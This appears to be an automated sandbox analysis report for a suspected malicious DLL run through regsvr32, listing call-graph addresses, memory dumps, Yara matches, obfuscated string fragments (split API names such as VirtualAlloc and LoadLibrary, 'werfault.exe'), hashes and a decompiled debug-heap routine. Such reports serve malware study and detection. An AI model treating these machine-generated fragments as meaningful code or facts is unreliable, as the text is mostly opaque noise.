malloc _calloc_dbg_impl _MarkAllocaS 16362->16364 16366 7fef9d2f604 _CrtMemDumpAllObjectsSince_stat 16362->16366 16365 7fef9d2f68b MultiByteToWideChar 16364->16365 16364->16366 16365->16366 16367 7fef9d2f6ca GetStringTypeW 16365->16367 16366->16360 16367->16366 16369 7fef9d3228b 16368->16369 16370 7fef9d322e1 16369->16370 16371 7fef9d3231f 
16369->16371 16372 7fef9d2bd70 _invalid_parameter 17 API calls 16370->16372 16373 7fef9d32385 16371->16373 16376 7fef9d323c3 _calloc_dbg_impl 16371->16376 16375 7fef9d32315 _calloc_dbg_impl 16372->16375 16374 7fef9d2bd70 _invalid_parameter 17 API calls 16373->16374 16374->16375 16375->16352 16376->16375 16377 7fef9d2bd70 _invalid_parameter 17 API calls 16376->16377 16377->16375 16378->16268 16380 7fef9d274b2 GetProcAddress 16379->16380 16381 7fef9d274d1 ExitProcess 16379->16381 16380->16381 16383 7fef9d290be 16382->16383 16384 7fef9d2914d 16383->16384 16385 7fef9d290fd DeleteCriticalSection 16383->16385 16386 7fef9d234a0 16384->16386 16387 7fef9d29196 DeleteCriticalSection 16384->16387 16385->16383 16386->16221 16387->16384 16430 7fef9d28670 GetEnvironmentStringsW 16431 7fef9d28690 16430->16431 16432 7fef9d28697 WideCharToMultiByte 16430->16432 16434 7fef9d2875f FreeEnvironmentStringsW 16432->16434 16435 7fef9d28733 16432->16435 16434->16431 16435->16434 16436 7fef9d2876e WideCharToMultiByte 16435->16436 16437 7fef9d287c2 FreeEnvironmentStringsW 16436->16437 16438 7fef9d287aa 16436->16438 16437->16431 16438->16437 18076 7fef9d41370 18077 7fef9d3af60 _unlock_file2 2 API calls 18076->18077 18078 7fef9d41390 18077->18078 16639 7fef9d28860 HeapCreate 16640 7fef9d28891 GetVersion 16639->16640 16641 7fef9d2888d 16639->16641 16642 7fef9d288c1 16640->16642 16643 7fef9d288a7 HeapSetInformation 16640->16643 16642->16641 16643->16642 18079 7fef9d31b64 18080 7fef9d31b9d 18079->18080 18081 7fef9d31c86 18080->18081 18082 7fef9d3ab10 17 API calls 18080->18082 18083 7fef9d31bed 18080->18083 18081->18083 18084 7fef9d39290 23 API calls 18081->18084 18082->18081 18084->18083 18834 7fef9d35260 18835 7fef9d35296 __SehTransFilter _CreateFrameInfo 18834->18835 18836 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18835->18836 18837 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18836->18837 18085 7fef9d41160 18088 7fef9d34e90 18085->18088 18087 7fef9d41179 18089 7fef9d34ecf 
18088->18089 18090 7fef9d34ebb 18088->18090 18089->18087 18090->18089 18091 7fef9d2cf50 terminate 35 API calls 18090->18091 18091->18089 18099 7fef9d3bb66 18100 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18099->18100 18101 7fef9d3bc46 18100->18101 18103 7fef9d3b99c 18100->18103 18102 7fef9d2bd70 _invalid_parameter 17 API calls 18101->18102 18106 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18102->18106 18104 7fef9d3cc93 18103->18104 18108 7fef9d3bada 18103->18108 18105 7fef9d2bd70 _invalid_parameter 17 API calls 18104->18105 18104->18106 18105->18106 18107 7fef9d23280 __GSHandlerCheck 8 API calls 18106->18107 18109 7fef9d3cd90 18107->18109 18110 7fef9d2bd70 _invalid_parameter 17 API calls 18108->18110 18110->18106

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                • String ID: :Pt$aZ.$!k}$"<t$"BQa$#sa{$$cb($$v"P$)*E$*p$+80Z$+sui$,'a$,kb($-~5$1+t$1>#J$1D4v$3/Q$4cg$9cnt$:-ZZ$?#$@kb($A+M$CwT>$GBQ+$N tW$N7#6$Pv5=$QS}5$Qp_*$Qv5$Qv}N$VqQS$[`$]=5[$^ir$_>zT$_>zT$a%"^$aQTH$b('x$b(/N$bkg2$c(kA$eMh$g(%"$gWQ>tTQv5MVM6qQS<jb(kAk%aQTGeMhH)59cj$hH)}$iAk%$kj$k%$b$k%a^$kW]>$o(fA$oRP$pNR`$pw ~$p0$q.$$t+)s$t/p$uTQ2$u'($werfault.exe$xT]v$}LhH$L`$@+*$L1&$S<j$aEy$w5M$|Oi$hH
                                • API String ID: 2181984824-2091011546
                                • Opcode ID: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                • Instruction ID: bb29df52505e4adc914c7d7009f7ad667354b97652f73d457c5e5bdb89db6ee0
                                • Opcode Fuzzy Hash: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                • Instruction Fuzzy Hash: 3FE2C8B250A7C18FE3748F66AE847DD3AA1F341748F609208C3991FA1DCB7A5255CF86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926408165.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2b0000_regsvr32.jbxd
                                Similarity
                                • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                • API String ID: 2313188843-2517549848
                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction ID: 0927d2af9352a1c10bb23b0ea1c64691f68e7e2c73622672a2ceb4e15a87d831
                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction Fuzzy Hash: 2572D730628B498BDB29DF18C8856FAB7E1FB98345F10462DE8CBC7211DB34E556CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :j$UI$UI$/$5$@u
                                • API String ID: 0-1744832406
                                • Opcode ID: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                • Instruction ID: 62cabd7460019d857fad8ef6802a9940dae2da1dd4c69d60ad9891f806a9e916
                                • Opcode Fuzzy Hash: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                • Instruction Fuzzy Hash: 35421971A1470EDFCB58DFA8C49A6EEBBF2FB44348F008159E806A7250DB719619CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: F:^-$[9S$zUP$?'3$yc
                                • API String ID: 0-3875576172
                                • Opcode ID: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                • Instruction ID: acf5a29543b44a4ac2cab22a28fc6f208f1c2d96f0abb29e90a070f971d4b191
                                • Opcode Fuzzy Hash: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                • Instruction Fuzzy Hash: 13720C7050038E8FDF49DF24C88A6DE3BA1FB68388F114619FC56962A1C7B4DA65CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !$>]$>]$vM/${Wo
                                • API String ID: 0-1672528178
                                • Opcode ID: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                • Instruction ID: 47ac1da3a1e26fe678bf2a9ce2069fe56df1d0f6d245f307fc2b30da9b08538d
                                • Opcode Fuzzy Hash: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                • Instruction Fuzzy Hash: 5C81197051464CABDBE9DF28C8C9BDD3BA0FB58394F906119FD02862A0DB74D9C5CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %DcZ$L\`$u%$vr
                                • API String ID: 0-873403245
                                • Opcode ID: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                • Instruction ID: 7a4330a3d3912fed14e69a2d18b4041e28774fe6b527757d4cbe653c4a95fa98
                                • Opcode Fuzzy Hash: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                • Instruction Fuzzy Hash: 0912F47152068CDFCB8CDF28C88AADD7BA1FB48398F956219FD0A97250D774D984CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .mZ$\$~V6k$%T
                                • API String ID: 0-3287852823
                                • Opcode ID: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                • Instruction ID: 166b9a2b8c7d7ea13ff64321e1c32e26f96a2e299ccb60065a18498a6503f561
                                • Opcode Fuzzy Hash: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                • Instruction Fuzzy Hash: 0402E8711013C8CBEBBECFA4D885BD97BA9FB44B44F10661AE84AAE250CBB45745CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 578 7fef9d28860-7fef9d2888b HeapCreate 579 7fef9d28891-7fef9d288a5 GetVersion 578->579 580 7fef9d2888d-7fef9d2888f 578->580 581 7fef9d288c1 579->581 582 7fef9d288a7-7fef9d288bb HeapSetInformation 579->582 583 7fef9d288c6-7fef9d288ca 580->583 581->583 582->581
                                APIs
                                • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$CreateInformationVersion
                                • String ID:
                                • API String ID: 3563531100-0
                                • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 078$GDo$}
                                • API String ID: 0-303245572
                                • Opcode ID: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                • Instruction ID: 0c94e6823936b68487d3afc04f5daf4118d9ac6b30c0afcc694cd4a40111a1d0
                                • Opcode Fuzzy Hash: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                • Instruction Fuzzy Hash: 32D1CAB051A784AFC398DF28C1CA94BBBE0FB84754F906A1DF88686260D7B0D945CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 599 180025c30-180025dae call 180010370 call 180015fb8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e@-0$f $wC
                                • API String ID: 0-2741453468
                                • Opcode ID: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                • Instruction ID: f8f9b13c1cb793f3116966172e7ed192e0f5529545d7cab8ca7c6d0d9d04acad
                                • Opcode Fuzzy Hash: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                • Instruction Fuzzy Hash: E2319571518B848FD3A8DF28C48975ABBE1FB84344F608A1DE6DACB260DB709549CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: L=`$rKS(
                                • API String ID: 0-4157335196
                                • Opcode ID: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                • Instruction ID: c6b4aee86e77721e5ec6a37c1ce5251b52915c7d30808e23b45806a77bf6ffc0
                                • Opcode Fuzzy Hash: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                • Instruction Fuzzy Hash: FD51BC705183848FC769DF29C18A64BBBF1FBC6784F108A1DE69A86261D772D909CF43
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8h
                                • API String ID: 0-2787117397
                                • Opcode ID: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                • Instruction ID: eb392778bd881193a348804f8d52045fa41d3382a0d9eae0dd8f361f159f4541
                                • Opcode Fuzzy Hash: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                • Instruction Fuzzy Hash: 28D12E7060578C8FEBBADF24CC997DE3BA0FB49744F504219D88A8E260CB745B49CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 160 (figure residue; API calls in graph: GetStartupInfoW, SetHandleCount, GetStdHandle, GetFileType, InitializeCriticalSectionAndSpinCount)
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                • API String ID: 1930727954-3864165772
                                • Opcode ID: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                • Instruction ID: 04d5086f9a303f60624db38f474b136a55c048ce8eacbf8a5fedaf0ba48a359d
                                • Opcode Fuzzy Hash: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                • Instruction Fuzzy Hash: DDF1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                • String ID: 0*/$_setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                • API String ID: 1648969265-474309611
                                • Opcode ID: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                • Instruction ID: dee10c55842e2b838f4c2249843f6d7af4c066fce2f7611d1afded1b25fdeaa1
                                • Opcode Fuzzy Hash: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                • Instruction Fuzzy Hash: D0514F31A1CA8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                • String ID:
                                • API String ID: 3799933513-0
                                • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                • API String ID: 1823725401-2473407871
                                • Opcode ID: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                • Instruction ID: ccbee8cdd8044984a813dbfd6c9bb6ca90d3427a1697cce954f0caea4fdd0345
                                • Opcode Fuzzy Hash: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                • Instruction Fuzzy Hash: 8B41A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47B68DBBED4548B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                  • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                  • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                  • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                  • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                • API String ID: 3828364660-3898981997
                                • Opcode ID: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                • Instruction ID: b9f7c2a4cabba63d90327ac94b1883ffc0a3f64b25b31a8ae36976c45a874ec4
                                • Opcode Fuzzy Hash: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                • Instruction Fuzzy Hash: 37115E30A2D60286F3E0AB29ED4577DA6E1B784B60F214275E9EE422F5DB2FE4048601
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                				signed int _t64;
                                				intOrPtr _t66;
                                				void* _t73;
                                				void* _t92;
                                				long long _t98;
                                				long long _t113;
                                				long long _t114;
                                				long long _t115;
                                				long long _t130;
                                				intOrPtr _t132;
                                				long long _t135;
                                
                                				if (_a136 == 1) goto 0xf9d24672;
                                				_t64 = _a136 & 0x0000ffff;
                                				if (_t64 == 2) goto 0xf9d24672;
                                				if (_a136 == 3) goto 0xf9d24672;
                                				_a40 = "Error: memory allocation: bad memory block type.\n";
                                				_a32 = "%s";
                                				r9d = 0;
                                				r8d = 0;
                                				0xf9d2ad00();
                                				if (_t64 != 1) goto 0xf9d24672;
                                				asm("int3");
                                				_t98 = _a128 + 0x34;
                                				_a96 = _t98;
                                				0xf9d2ac90(); // executed
                                				_a80 = _t98;
                                				if (_a80 != 0) goto 0xf9d246b8;
                                				if (_a160 == 0) goto 0xf9d246b3;
                                				 *_a160 = 0xc;
                                				goto 0xf9d248b4;
                                				_t66 =  *0xf9d4b03c; // 0x38
                                				 *0xf9d4b03c = _t66 + 1;
                                				if (_a64 == 0) goto 0xf9d2472d;
                                				 *_a80 = 0;
                                				 *((long long*)(_a80 + 8)) = 0;
                                				 *((long long*)(_a80 + 0x10)) = 0;
                                				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                				 *((long long*)(_a80 + 0x20)) = _a128;
                                				 *(_a80 + 0x1c) = 3;
                                				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                				goto 0xf9d24844;
                                				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
                                				_t130 =  *0xf9d4c960; // 0x42cc
                                				 *0xf9d4c960 = _t130 + _a128;
                                				goto 0xf9d2476e;
                                				 *0xf9d4c960 = 0xffffffff;
                                				_t132 =  *0xf9d4c990; // 0xa0c
                                				 *0xf9d4c990 = _t132 + _a128;
                                				_t113 =  *0xf9d4c978; // 0x32f4
                                				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
                                				if (_t92 <= 0) goto 0xf9d247a8;
                                				_t114 =  *0xf9d4c990; // 0xa0c
                                				 *0xf9d4c978 = _t114;
                                				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
                                				_t115 =  *0xf9d4c980; // 0x2f3b00
                                				 *((long long*)(_t115 + 8)) = _a80;
                                				goto 0xf9d247d0;
                                				 *0xf9d4c968 = _a80;
                                				_t135 =  *0xf9d4c980; // 0x2f3b00
                                				 *_a80 = _t135;
                                				 *((long long*)(_a80 + 8)) = 0;
                                				 *((long long*)(_a80 + 0x10)) = _a144;
                                				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                				 *((long long*)(_a80 + 0x20)) = _a128;
                                				 *(_a80 + 0x1c) = _a136;
                                				_t78 = _a88;
                                				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                				 *0xf9d4c980 = _a80;
                                				r8d = 4;
                                				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                				_t145 = _a128;
                                				r8d = 4;
                                				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                				_a72 = _a80 + 0x30;
                                				return E000007FE7FEF9D29360(_t73, 4);
                                			}















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
